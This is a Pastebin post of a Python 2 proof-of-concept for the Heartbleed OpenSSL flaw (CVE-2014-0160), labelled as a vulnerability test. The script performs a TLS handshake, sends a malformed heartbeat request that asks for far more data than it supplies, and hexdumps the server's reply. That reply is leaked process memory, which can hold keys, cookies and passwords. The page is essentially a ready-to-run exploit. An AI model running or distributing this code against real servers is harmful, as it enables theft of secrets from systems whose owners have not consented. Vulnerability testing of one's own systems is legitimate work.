Advertisement
Guest User

Heartbleed POC

a guest
Apr 9th, 2014
280
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.65 KB | None | 0 0
  1. import sys
  2. import struct
  3. import socket
  4. import time
  5. import select
  6. import re
  7. from optparse import OptionParser
  8.  
  9. options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
  10. options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
  11. options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS')
  12. options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output')
  13.  
  14. def h2bin(x):
  15.     return x.replace(' ', '').replace('\n', '').decode('hex')
  16.  
  17. hello = h2bin('''
  18. 16 03 02 00  dc 01 00 00 d8 03 02 53
  19. 43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
  20. bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
  21. 00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
  22. 00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
  23. c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
  24. c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
  25. c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
  26. c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
  27. 00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
  28. 03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
  29. 00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
  30. 00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
  31. 00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
  32. 00 0f 00 01 01                                  
  33. ''')
  34.  
  35. hb = h2bin('''
  36. 18 03 02 00 03
  37. 01 40 00
  38. ''')
  39.  
  40. def hexdump(s):
  41.     for b in xrange(0, len(s), 16):
  42.         lin = [c for c in s[b : b + 16]]
  43.         hxdat = ' '.join('%02X' % ord(c) for c in lin)
  44.         pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
  45.         print '  %04x: %-48s %s' % (b, hxdat, pdat)
  46.     print
  47.  
  48. def recvall(s, length, timeout=5):
  49.     endtime = time.time() + timeout
  50.     rdata = ''
  51.     remain = length
  52.     while remain > 0:
  53.         rtime = endtime - time.time()
  54.         if rtime < 0:
  55.             return None
  56.         r, w, e = select.select([s], [], [], 5)
  57.         if s in r:
  58.             data = s.recv(remain)
  59.             # EOF?
  60.             if not data:
  61.                 return None
  62.             rdata += data
  63.             remain -= len(data)
  64.     return rdata
  65.        
  66.  
  67. def recvmsg(s):
  68.     hdr = recvall(s, 5)
  69.     if hdr is None:
  70.         print 'Unexpected EOF receiving record header - server closed connection'
  71.         return None, None, None
  72.     typ, ver, ln = struct.unpack('>BHH', hdr)
  73.     pay = recvall(s, ln, 10)
  74.     if pay is None:
  75.         print 'Unexpected EOF receiving record payload - server closed connection'
  76.         return None, None, None
  77.     print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
  78.     return typ, ver, pay
  79.  
  80. def hit_hb(s):
  81.     s.send(hb)
  82.     while True:
  83.         typ, ver, pay = recvmsg(s)
  84.         if typ is None:
  85.             print 'No heartbeat response received, server likely not vulnerable'
  86.             return False
  87.  
  88.         if typ == 24:
  89.             print 'Received heartbeat response:'
  90.             hexdump(pay)
  91.             if len(pay) > 3:
  92.                 print 'WARNING: server returned more data than it should - server is vulnerable!'
  93.             else:
  94.                 print 'Server processed malformed heartbeat, but did not return any extra data.'
  95.             return True
  96.  
  97.         if typ == 21:
  98.             print 'Received alert:'
  99.             hexdump(pay)
  100.             print 'Server returned error, likely not vulnerable'
  101.             return False
  102.  
  103. def main():
  104.     opts, args = options.parse_args()
  105.     if len(args) < 1:
  106.         options.print_help()
  107.         return
  108.  
  109.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  110.     print 'Connecting...'
  111.     sys.stdout.flush()
  112.     s.connect((args[0], opts.port))
  113.  
  114.     if opts.starttls:
  115.         re = s.recv(4096)
  116.         if opts.debug: print re
  117.         s.send('ehlo starttlstest\n')
  118.         re = s.recv(1024)
  119.         if opts.debug: print re
  120.         if not 'STARTTLS' in re:
  121.             if opts.debug: print re
  122.             print 'STARTTLS not supported...'
  123.             sys.exit(0)
  124.         s.send('starttls\n')
  125.         re = s.recv(1024)
  126.    
  127.     print 'Sending Client Hello...'
  128.     sys.stdout.flush()
  129.     s.send(hello)
  130.     print 'Waiting for Server Hello...'
  131.     sys.stdout.flush()
  132.     while True:
  133.         typ, ver, pay = recvmsg(s)
  134.         if typ == None:
  135.             print 'Server closed connection without sending Server Hello.'
  136.             return
  137.         # Look for server hello done message.
  138.         if typ == 22 and ord(pay[0]) == 0x0E:
  139.             break
  140.  
  141.     print 'Sending heartbeat request...'
  142.     sys.stdout.flush()
  143.     s.send(hb)
  144.     hit_hb(s)
  145.  
  146. if __name__ == '__main__':
  147.     main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement